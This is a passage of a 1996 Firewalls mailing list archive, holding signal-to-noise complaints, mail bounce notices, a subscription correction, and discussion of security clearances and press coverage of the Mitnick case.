requests," *IF* they even said > that much. Can we stop hearing about your father already ? The relevance os his life and firewalls eludes me, except that he is yet another person who has worked with a security classification, much like thousands of other Americans have and do. I've already prompted you twice in private e-mail about getting off-course as far as firewalls, now I'm asking you publicly: please desist. I'm sure there are others (hi Padgett :) who have equally fascinating stories. Start alt.security.stories or something, but please keep posts here about firewalls, issues relating to firewalls and not just general ITSEC gunk. There are also comp.security.firewalls, comp.security.misc as other forums for you to tell the world about his adventures if you feel the need. Lets try bring the singal:noise ratio up ? Thank you, Darren From firewalls-owner Mon Jan 15 20:10:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA14643 for firewalls-outgoing; Mon, 15 Jan 1996 19:55:41 -0800 (PST) Received: from saguaro.flyingfox.com (saguaro.flyingfox.com [204.188.109.125]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA14638 for ; Mon, 15 Jan 1996 19:55:37 -0800 (PST) Received: (from jas@localhost) by saguaro.flyingfox.com (8.6.12/8.6.10) id TAA19538; Mon, 15 Jan 1996 19:52:53 -0800 Date: Mon, 15 Jan 1996 19:52:53 -0800 From: Jim Shankland Message-Id: <199601160352.TAA19538@saguaro.flyingfox.com> To: blymn@awadi.com.au, shan.bell@sware.com Subject: Re: "Title for Firewall Admin? Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jeez, I hate to be a signal-to-noise grouch, especially because being one in public just adds to the noise, but personally, I'm about saturated on security clearance trivia, whose father ought to be arrested, what to call a firewall administrator, and details about the movie "Ghostbusters." Just another data point. Jim Shankland Flying Fox Computer Systems, Inc. From firewalls-owner Mon Jan 15 20:55:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA17678 for firewalls-outgoing; Mon, 15 Jan 1996 20:49:36 -0800 (PST) Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA17673 for ; Mon, 15 Jan 1996 20:49:30 -0800 (PST) Received: from gateway.deere.com by relay5.UU.NET with SMTP id QQzysh25146; Mon, 15 Jan 1996 23:48:35 -0500 (EST) Received: by gateway.deere.com; id WAA29519; Mon, 15 Jan 1996 22:48:32 -0600 Received: from deere.com(192.43.1.3) by gateway.deere.com via smap (g3.0.1) id xma029510; Mon, 15 Jan 96 22:48:20 -0600 Received: from TCP30.DX.DEERE.COM (tcp30-11.dx.deere.com) by deere.dx.deere.com (4.1/SMI-4.0) id AA16974; Mon, 15 Jan 96 22:48:21 CST Received: by TCP30.DX.DEERE.COM (Soft*Switch Central V4L380P6) id 415845220096015FDACDXC01; 15 Jan 1996 22:45:22 GMT Message-Id: Date: 15 Jan 1996 22:45:22 GMT From: "Postmaster" Subject: DISTRIBUTION STATUS To: Firewalls@GREATCIRCLE.COM Comment: MEMO 01.15.96 22.45 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk SAUTOIN1.FIREWALL DISTRIBUTION STATUS INFORMATION 01/15/96 22: 45:00 ======================================================================= DISTRIBUTION ID: SAUTOIN1.FIREWALL.4056 SUBJECT : Firewalls-Digest V5 #31 DOCUMENT NAME : %%DOCNAME DATE SENT : 01/15/96 TIME SENT: 22:33:00 ======================================================================= YOUR MAIL WAS NOT DELIVERED FOR THE FOLLOWING REASON: SNADS STATUS : 000F X.400 CODE : %%DIAGCODE INFORMATION : %%SUPPLINFO EXPLANATION : SNADS SYSTEM ERROR ======================================================================= RECIPIENT : DACRXL01.OUTX187 LAST NAME : RATH FIRST NAME : JOHN MIDDLE INITIAL : INITIALS : NATIVE NAME : COUNTRY : US ADMD : TELEMAIL PRMD : TRT400 ORGANIZATION : JOHN DEERE ORG UNIT 1 : DACRXL01 ORG UNIT 2 : ORG UNIT 3 : ORG UNIT 4 : DDA : ID!OUTX187 TITLE : DESKTOP SUPPORT DESCRIPTION : CUSTOMER SUPPORT (TEAM TECH) USERDATA : T 426:DUBUQUE WORKS TELEPHONE : 3015123 From firewalls-owner Mon Jan 15 21:10:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA17643 for firewalls-outgoing; Mon, 15 Jan 1996 20:48:35 -0800 (PST) Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA17637 for ; Mon, 15 Jan 1996 20:48:31 -0800 (PST) Received: from gateway.deere.com by relay5.UU.NET with SMTP id QQzysh25059; Mon, 15 Jan 1996 23:47:34 -0500 (EST) Received: by gateway.deere.com; id WAA29468; Mon, 15 Jan 1996 22:47:30 -0600 Received: from deere.com(192.43.1.3) by gateway.deere.com via smap (g3.0.1) id xma029432; Mon, 15 Jan 96 22:47:24 -0600 Received: from TCP30.DX.DEERE.COM (tcp30-11.dx.deere.com) by deere.dx.deere.com (4.1/SMI-4.0) id AA16813; Mon, 15 Jan 96 22:47:23 CST Received: by TCP30.DX.DEERE.COM (Soft*Switch Central V4L380P6) id 285445220096015FDACDXC01; 15 Jan 1996 22:45:22 GMT Message-Id: Date: 15 Jan 1996 22:45:22 GMT From: "Postmaster" Subject: DISTRIBUTION STATUS To: Firewalls@GREATCIRCLE.COM Comment: MEMO 01.15.96 22.45 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk SAUTOIN1.FIREWALL DISTRIBUTION STATUS INFORMATION 01/15/96 22: 45:00 ======================================================================= DISTRIBUTION ID: SAUTOIN1.FIREWALL.4032 SUBJECT : Firewalls-Digest V5 #32 DOCUMENT NAME : %%DOCNAME DATE SENT : 01/15/96 TIME SENT: 22:30:00 ======================================================================= YOUR MAIL WAS NOT DELIVERED FOR THE FOLLOWING REASON: SNADS STATUS : 000F X.400 CODE : %%DIAGCODE INFORMATION : %%SUPPLINFO EXPLANATION : SNADS SYSTEM ERROR ======================================================================= RECIPIENT : DACRXL01.OUTX187 LAST NAME : RATH FIRST NAME : JOHN MIDDLE INITIAL : INITIALS : NATIVE NAME : COUNTRY : US ADMD : TELEMAIL PRMD : TRT400 ORGANIZATION : JOHN DEERE ORG UNIT 1 : DACRXL01 ORG UNIT 2 : ORG UNIT 3 : ORG UNIT 4 : DDA : ID!OUTX187 TITLE : DESKTOP SUPPORT DESCRIPTION : CUSTOMER SUPPORT (TEAM TECH) USERDATA : T 426:DUBUQUE WORKS TELEPHONE : 3015123 From firewalls-owner Mon Jan 15 21:25:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA19400 for firewalls-outgoing; Mon, 15 Jan 1996 21:21:49 -0800 (PST) Received: from mailx.best.com (mailx.best.com [204.156.128.56]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id VAA19349 for ; Mon, 15 Jan 1996 21:21:39 -0800 (PST) Received: from shellx.best.com (shellx.best.com [206.86.0.11]) by mailx.best.com (950911.SGI.8.6.12.PATCH825/8.6.5) with ESMTP id FAA00349 for ; Tue, 16 Jan 1996 05:22:56 GMT Received: from [204.156.142.55] (dima.vip.best.com [204.156.142.55]) by shellx.best.com (950911.SGI.8.6.12.PATCH825/8.6.5) with SMTP id VAA00414 for ; Mon, 15 Jan 1996 21:20:41 -0800 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 15 Jan 1996 21:24:06 -0800 To: Firewalls@GREATCIRCLE.COM From: dima@best.com (Dimitry Nasledov) Subject: please fix this list Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Good evening, whoever added dima@best.com to this list! Please remove him from there. You might have been meaning Dima Ruban at best.com. His correct e-mail is: rdy@best.com. Please fix it soon! Thanks! =Other (wrong) Dima From firewalls-owner Mon Jan 15 22:10:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA24169 for firewalls-outgoing; Mon, 15 Jan 1996 22:05:17 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id WAA24164 for ; Mon, 15 Jan 1996 22:05:13 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id BAA31914; Tue, 16 Jan 1996 01:03:16 -0500 Date: Tue, 16 Jan 1996 01:03:15 -0500 (EST) From: Brain21 To: Berry Kercheval , firewalls@GreatCircle.COM Subject: Re: "Q" Clearance In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 15 Jan 1996, Brain21 wrote: > On Sat, 13 Jan 1996, Berry Kercheval wrote: > > > It's really not that hard. Top Secret is a Department of Defense clearance > > level. "Q" is a Department of Energy clearance level. > > This all strikes me as odd. When my father did work for that > > I'll have to call and ask him. Well, I did call and ask. He said he has no idea where I got the idea that "Q" was DoD, and not DoE. I suspect I must've heard something out of context, or he mispoke or something. Anyway, he won't tell me now what clearance he had at the DoD :( Brain21 From firewalls-owner Mon Jan 15 22:25:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA23082 for firewalls-outgoing; Mon, 15 Jan 1996 21:55:32 -0800 (PST) Received: from zang.com (zang.com [204.182.238.150]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id VAA23067 for ; Mon, 15 Jan 1996 21:55:27 -0800 (PST) Received: (from mark@localhost) by zang.com (8.6.9/zang) id TAA08067 for firewalls@greatcircle.com; Mon, 15 Jan 1996 19:52:18 -1000 From: Mark (Mookie) Message-Id: <199601160552.TAA08067@zang.com> Subject: Re: The Last Mitnick Post/Thread To: firewalls@greatcircle.com Date: Mon, 15 Jan 1996 19:52:15 -1000 (HST) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Markoff, and Tsutomo acted reprehensibly by quoting sniffer sessions with Kevin >and jsz in which my site was mentioned. Not only were the facts wrong At the time everyone knew Kevin was getting very warm, the simple social contacts people had with him were becoming insidious due to the increased attention being put on him. He was becoming rather infatuated with some people too which some of his antics show. It was in this climate that a process of alientation began where lies were fed him and procrastination was offered as a reason for avoiding his spheres and requests. Noone wants to hold the hot potato. I'm actually observing similar activities today as someone who has a court date approaching is becoming alienated by his own actions and the attitudes of others. Preparing to go to jail was my first thought. Some people never learn. >who/what netsys.com/Len Rose is, they only bothered to mention the past and not What do you expect? They are out for emotive impact, bugger the facts. You being an internet service provider doesnt sell, but a couple of events in the past can be made to give everything a dark and dangerous flavour. Pique interest and generate another percent of sales. >perhaps someone could clear jsz's name which seems to be pretty muddied by the >somewhat irresponsible literary excesses which seem to fill the Tsutomo/Markoff Him and all the others I've heard bandied about. It's a case of tall poppy syndrome where anyone who has a brain is pushed into a higher status than they want or deserve. I've seen a number of people recently who have been spoken of in vaulted tones or thought of as bleeding edge merely because they have had exposure to a lot of systems and their skill set is more than passa